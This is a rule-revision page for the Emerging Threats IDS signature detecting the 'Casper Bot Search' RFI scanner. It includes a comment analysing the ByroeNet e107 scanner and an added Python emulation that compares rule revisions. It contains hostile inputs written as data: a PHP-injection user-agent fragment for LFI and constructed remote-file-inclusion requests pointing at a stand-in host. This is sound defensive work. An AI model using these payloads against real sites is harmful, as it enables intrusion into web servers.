alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"Casper Bot"; nocase; http_user_agent; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; sid:2011175; rev:7; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-08-07 21:04:20 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"User-Agent|3a| Casper Bot Search|0D 0A|"; fast_pattern:only; nocase; http_header; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; sid:2011175; rev:6;)

Added 2011-10-12 19:31:29 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"User-Agent|3a| Casper Bot Search|0D 0A|"; fast_pattern:only; nocase; http_header; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2011175; sid:2011175; rev:6;)

Added 2011-09-14 22:44:54 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"User-Agent|3a| Casper Bot Search|0D 0A|"; fast_pattern:only; nocase; http_header; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:6;)

Added 2011-02-04 17:30:56 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:4;)

Added 2010-07-29 22:04:59 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Casper; sid:2011175; rev:5;)

Added 2010-07-29 19:30:58 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:4;)

Added 2010-07-29 14:16:22 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Casper; sid:2011175; rev:3;)

Added 2010-07-26 11:52:24 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENT_Casper_RFI_Bot; classtype:web-application-attack; sid:2011175; rev:2;)

Added 2010-07-08 19:31:10 UTC

Just to provide you with more information about these Casper user agents.

These user agents are hard-coded into the "ByroeNet" scanner, dated 17/06/2010.

Source code of the scanner: http://pastebin.com/zBUHC3d9

The scanner is an evolution of the BaMbY scanner dated 28/05/2010: http://novie.fileave.com/rfi.txt

This new scanner was first seen on the Internet on 17 Jun 2010 at t7.fileave.com/e107.txt, and was directly exploited after its creation.

http://www.google.com/search?q=%22%24powered%3D%22ByroeNet%22%3B%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:fr:official&client=firefox-a

More precisely, this scanner integrates a new functionality into its "normal functionalities": an e107 scanner.

The e107 scanner (cmde107 - e107scan), with dork support, tries to exploit the RCE vulnerability discovered on 24 May 2010: http://www.exploit-db.com/exploits/12715/

But besides its traditional RFI scanner and dorks, the scanner can also exploit the LFI vulnerability discovered on 31 May 2010: http://www.exploit-db.com/exploits/12818/

The ByroeNet scanner defines different user agents by default, which are customisable:

For sub cmdxml : my $userAgent = LWP::UserAgent->new(agent => 'perl post');

For sub cmde107 : $access->agent("Mozilla/5.0");

For sub e107scan : $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');

For sub xmlcek : my $userAgent = LWP::UserAgent->new(agent => 'perl post');

For sub xmlxspread : my $userAgent = LWP::UserAgent->new(agent => 'perl post');

For sub lfiexploit (normal for /proc/self/environ exploitation) : my $agent = "";

For sub cmdlfi (normal for /proc/self/environ exploitation) : my $hie = "j13mbut /dev/stdout\"); ?>j13mbut"; $browser->agent("$hie");

After investigating my honeynet web logs for a period of one month, I got these different user agents targeting e107 exploits:

http://eromang.zataz.com/uploads/e107_user_agents.txt

You can find the default configured user agents: Mozilla/5.0, Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u), perl post

But also Casper user agents: Casper Bot Search MaMa CaSpEr

And some new user agents: b3b4s Bot Search dex Bot Search Dex Bot Search kmccrew Bot Search plaNETWORK Bot Search rk q kangen sasqia Bot Search sledink Bot Search

As you can see, the user agents only reflect the "Crew" or "Team" that is using the "ByroeNet" scanner.

Here are some stats for the user agents:

http://eromang.zataz.com/2010/07/13/byroenet-casper-bot-search-e107-rce-scanner/

Casper Bot Search is really the most prolific user agent, but the other user agents must also be considered.

In conclusion, the mutation of the traditional RFI scanner is clearly demonstrated, and I don't think that such ET rules are really effective, because each "Crew" or "Team" dedicates its attacks by customising the user agents (same as a graffiti tagger).

Emerging Threats rules shouldn't focus on user agents but more on attack vectors, because user agents are too volatile.

Regards.

-- MattJonkman - 14 Jul 2010
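Added example (not Emerging Threats code, not code from the scanner author, and not a Snort or Suricata implementation): a small Python emulation of how this signature's content match behaves at rev 4 (a raw byte pattern over the payload, including the header name, the ": " separator and the CRLF) and at rev 7 (a substring match inside the parsed User-Agent value via http_user_agent), run over constructed requests carrying the user agents listed in the comment above. It also includes an illustrative, assumed query-string check in the spirit of the comment's "focus on attack vectors" suggestion; that check, the sample requests, the host name and the 203.0.113.5 address are assumptions for illustration only, and the `flow`, port and fast_pattern parts of the rule are not emulated.

```python
"""Emulate the content match of ET SID 2011175 at rev 4 (raw bytes) and
rev 7 (http_user_agent buffer) over constructed requests.
Added example for this page: not Emerging Threats code and not a Snort
or Suricata implementation; only the content/nocase/buffer semantics
of the two rule revisions are approximated, not flow or port checks."""
import re

# rev 4: content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase;
# A raw substring match over the payload: the header name, the ": "
# separator and the CRLF terminator are all part of the pattern.
REV4_PATTERN = b"\r\nUser-Agent: Casper Bot Search\r\n"

# rev 7: content:"Casper Bot Search"; nocase; http_user_agent;
# Matched only against the parsed User-Agent value.
REV7_PATTERN = b"Casper Bot Search"


def match_rev4(raw):
    """Case-insensitive raw search, as `content ... nocase` with no buffer."""
    return REV4_PATTERN.lower() in raw.lower()


def user_agent_buffer(raw):
    """Approximation of Suricata's http_user_agent buffer: the User-Agent
    value with the header name matched case-insensitively and the optional
    whitespace (space or tab) around the value stripped; b"" if absent."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:           # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"user-agent":
            return value.strip(b" \t")
    return b""


def match_rev7(raw):
    return REV7_PATTERN.lower() in user_agent_buffer(raw).lower()


# Illustrative vector-based check (an assumption, not an ET rule): flag any
# query-string parameter whose value is an absolute http(s) URL, which is
# what an RFI scanner sends regardless of its User-Agent.
RFI_QUERY = re.compile(rb"[?&][^=&\s]+=https?://", re.IGNORECASE)


def looks_like_rfi(raw):
    request_line = raw.split(b"\r\n", 1)[0]
    return RFI_QUERY.search(request_line) is not None


def request(ua_line, target=b"/index.php?page=http://203.0.113.5/id.txt?"):
    """Build a constructed HTTP/1.0 request; ua_line is a raw header line
    (None to omit the header). Host and target are made up for the example."""
    lines = [b"GET " + target + b" HTTP/1.0", b"Host: victim.example"]
    if ua_line is not None:
        lines.append(ua_line)
    return b"\r\n".join(lines) + b"\r\n\r\n"


# Constructed samples (not captured traffic); the UA strings are the ones
# the comment above lists as seen in the honeynet logs.
SAMPLES = {
    # stock UA hard-coded in the scanner: every revision alerts
    "casper": request(b"User-Agent: Casper Bot Search"),
    # same value, tab as the optional whitespace after the colon (valid
    # HTTP): rev 4's raw ": " sequence misses it, rev 7's buffer does not
    "casper_tab": request(b"user-agent:\tcasper bot search"),
    # crew-customised UA from the list above: same scanner, no alert
    "kmccrew": request(b"User-Agent: kmccrew Bot Search"),
    # e107 sub-scanner default UA: looks like any browser
    "mozilla": request(b"User-Agent: Mozilla/5.0"),
    # ordinary request with a local page name in the query string
    "benign": request(b"User-Agent: Mozilla/5.0", target=b"/index.php?page=about"),
}


def evaluate(raw):
    """Return which of the three checks fire for one request."""
    return {"rev4": match_rev4(raw), "rev7": match_rev7(raw),
            "rfi_query": looks_like_rfi(raw)}


if __name__ == "__main__":
    print(f"{'sample':<12}{'rev4':<7}{'rev7':<7}rfi_query")
    for name, raw in SAMPLES.items():
        r = evaluate(raw)
        print(f"{name:<12}{str(r['rev4']):<7}{str(r['rev7']):<7}{r['rfi_query']}")
```

Running it prints one row per sample: the stock "Casper Bot Search" request trips both revisions, the tab-separated variant is missed by the rev 4 raw pattern but caught once the match moves into the normalised User-Agent buffer, and the crew-renamed and Mozilla/5.0 requests trip neither revision while the query-string heuristic still flags them. The real http_user_agent buffer in Suricata involves more normalisation than this parser does, so treat `user_agent_buffer` as an approximation of the rule semantics, not a reference implementation.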


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper RFI Bot Search"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENT_Casper_RFI_Bot; classtype:web-application-attack; sid:2011175; rev:1;)

Added 2010-07-08 19:16:03 UTC


Topic revision: r2 - 2010-07-14 - MattJonkman
 